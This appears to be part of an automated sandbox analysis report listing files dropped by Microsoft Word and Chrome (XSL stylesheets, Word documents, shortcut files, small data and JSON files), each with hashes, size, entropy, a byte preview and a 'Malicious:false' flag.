                                                                                      SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                      SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):250983
                                                                                      Entropy (8bit):5.057714239438731
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                      MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                      SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                      SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                      SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):51826
                                                                                      Entropy (8bit):5.541375256745271
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                      MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                      SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                      SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                      SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                      Malicious:false
                                                                                      Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):47296
                                                                                      Entropy (8bit):6.42327948041841
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                      MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                      SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                      SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                      SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                      Malicious:false
                                                                                      Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):34415
                                                                                      Entropy (8bit):7.352974342178997
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                      MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                      SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                      SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                      SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                      Malicious:false
                                                                                      Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):3465076
                                                                                      Entropy (8bit):7.898517227646252
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                      MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                      SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                      SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                      SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                      Malicious:false
                                                                                      Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12
                                                                                      Entropy (8bit):0.41381685030363374
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:/l:
                                                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                      Malicious:false
                                                                                      Preview:............
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12
                                                                                      Entropy (8bit):0.41381685030363374
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:/l:
                                                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                      Malicious:false
                                                                                      Preview:............
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12
                                                                                      Entropy (8bit):0.41381685030363374
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:/l:
                                                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                      Malicious:false
                                                                                      Preview:............
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12
                                                                                      Entropy (8bit):0.41381685030363374
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:/l:
                                                                                      MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                      SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                      SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                      SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                      Malicious:false
                                                                                      Preview:............
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 16:08:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2673
                                                                                      Entropy (8bit):3.9839890572754793
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8XdhTJJ5HUidAKZdA1FehwiZUklqehQy+3:8PvI/y
                                                                                      MD5:AA00D52DB17D4E8E66120EC990921598
                                                                                      SHA1:3B6186F24FF6E07554B931B769C2F2ACD187BA6E
                                                                                      SHA-256:5E14671645FE27DC37DC56FC46712379B3FB509A8D43C974D43E2355433A453A
                                                                                      SHA-512:09260EE748903E7F613B2D122E566343616301888C26F34DA40D10BC413A29CF92725634C4F7E52F0FC63C50F5DF229728F8B0B10085745381098F72F60A8A8C
                                                                                      Malicious:false
                                                                                      Preview:L..................F.@.. ...$+.,......8..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g'5.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 16:08:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2675
                                                                                      Entropy (8bit):3.999159780887512
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:81dhTJJ5HUidAKZdA1seh/iZUkAQkqehvy+2:8Jv+9QWy
                                                                                      MD5:2EBF8B0CE73291C9C972DC850F0398AD
                                                                                      SHA1:8D145D4583E7F1164994DDEDFACC141E01154CBC
                                                                                      SHA-256:B46047A11256C8561E5D352E1449A63ECB0F31ECDFBD94DEA172FA4F6E4D4EB0
                                                                                      SHA-512:99C2B978CAC861A943D429AC842ADBE17BADCA61E3F275D502AC2EBBE8F1487CCE7581EAF6E3B9FE2CEC0E0FDD27AEA5227E1BC79A303DCC98EDC29016552FAC
                                                                                      Malicious:false
                                                                                      Preview:L..................F.@.. ...$+.,.....-..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g'5.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2689
                                                                                      Entropy (8bit):4.006080672009744
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8ydhTJJAHUidAKZdA14meh7sFiZUkmgqeh7sdy+BX:8UvBnLy
                                                                                      MD5:9E05DCCE5423FD841EC2292E145E4C5F
                                                                                      SHA1:14A4D4FEAD8D7490376AD59FE2459B318C140F71
                                                                                      SHA-256:0DB708627DC2D499E6852ADD84003156DBB206B6C60FEE27A7581E50E8A2622F
                                                                                      SHA-512:DE7C3EAEEF835512A8AF2685878DFB7DD3030931861FF1DE7A03B683BE626781ABEF55B0748F74C6728CA5749005614AA572E0E6DAC30AEE6E04A92F56CB152D
                                                                                      Malicious:false
                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g'5.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 16:08:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2677
                                                                                      Entropy (8bit):3.9971646692713887
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8gdhTJJ5HUidAKZdA1TehDiZUkwqehjy+R:82v1Vy
                                                                                      MD5:953198D128F8E0C57CEFE1E228A6323F
                                                                                      SHA1:96135B2F5B557182CB1350A06DDAB0DFB952AAD7
                                                                                      SHA-256:DEC0DEE3B07994CC7E47D24D667A6CBCCDA3F0489B5C79DF4D71248582554C4C
                                                                                      SHA-512:CCE29DF810E3DB1E12B14956B572250B1946D7EE958D21868DABDB8A6EE8DCC827FFD048E8C054CD1F6B3118045B82C21AA796CEC6C865B05C6CCAD2DEA02250
                                                                                      Malicious:false
                                                                                      Preview:L..................F.@.. ...$+.,.....y'..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g'5.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 16:08:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2677
                                                                                      Entropy (8bit):3.9853791436277364
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8xdhTJJ5HUidAKZdA1dehBiZUk1W1qehJy+C:8VvF9py
                                                                                      MD5:BDA405FB5183187AC11DD1711BE05AFA
                                                                                      SHA1:7B47FBFF4B4A5DCEDEFB3E2F39DFF4361BCBE7FF
                                                                                      SHA-256:6B598874EE8DF75F377E2B52CE740D28E308C59195A87666BB9FAFC6C7E63A30
                                                                                      SHA-512:C8047FFEE89A6B112BECE0AA91361709E19AD0BAF28272C64DB1089A0017A6A3912A47B403141513E83436BD99792E40E4B0580FC06A9694D2CA8BFA3662CEF8
                                                                                      Malicious:false
                                                                                      Preview:L..................F.@.. ...$+.,......3..7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g'5.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 15 16:08:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2679
                                                                                      Entropy (8bit):3.9955935758717036
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8WedhTJJ5HUidAKZdA1duTeehOuTbbiZUk5OjqehOuTbLy+yT+:8JvtTfTbxWOvTbLy7T
                                                                                      MD5:A87A93B5B0476EF9F88DCE6C569FE086
                                                                                      SHA1:5C8CFCF60E0294728771C5E7B31F3132B62CC825
                                                                                      SHA-256:9674E072C15132B4D27A48AB15BE4C20E5D85473E0BAB288FFBE523D6DDAD4F3
                                                                                      SHA-512:85E50435689D49F97A993D160938236CA3EB07A7B97018156280495F9F398C51D0440DCC897813E942936C7AB123162FFC4A43CA5CF58E959A0FEE87C77D028A
                                                                                      Malicious:false
                                                                                      Preview:L..................F.@.. ...$+.,.........7..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IoY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VoY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VoY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VoY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VoY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g'5.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.607220773054883
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:N/n/n/n/n/n/n/n/n/n/n/nONkn2wenAaxesY8:s22R/xzY8
                                                                                      MD5:72964AC354358F48CE87B8C541D0038C
                                                                                      SHA1:574FA02C38682DE4ADD144CDF8AAC4BB525267E3
                                                                                      SHA-256:7202DCE52C1CCFDFA34EB3C8076DA7E88C464EE30115FFD8B0C5C5745FE46F20
                                                                                      SHA-512:C2D6BA95F40AA3207E81C6656C9533DFDDF03A6AF316AD378C024948DDE49990E88075C284F7EE4BE66ED8F1315E453E4F39DF32AB7661EAA81CB01DDD5E9A07
                                                                                      Malicious:false
                                                                                      Preview:..........................................................00ff0000ff0000ff0000ff0000ff0000ff0000ff0000ff0000ff0000ff0000ff0000ff00.7.........P...}.j.....S...=wj
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1796
                                                                                      Entropy (8bit):6.022829426746665
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:p/hQRFG9I1RtpFNgS7akeFTfblt3zZ7NgAmklV:RWGSRtl7aPFfblNzZJ7mGV
                                                                                      MD5:5B77D17F742E17839C63648C16624020
                                                                                      SHA1:F086CADC1EFC9C6BCFC600B22C9DD43F3FA37B4A
                                                                                      SHA-256:5FB6F49AB5D7ACD8B8E2364F228F3F1B2664CAA36D0FDA5DE48BF050CF0A097D
                                                                                      SHA-512:EB21F509ECC70504C340BA3A23A16225DA54DB6298B851CDD2AE1F4731CA2197FF0DB08E12F8592E2BF8577F69AC7C8998C69B96487FDE0B41732E767EA3D2BE
                                                                                      Malicious:false
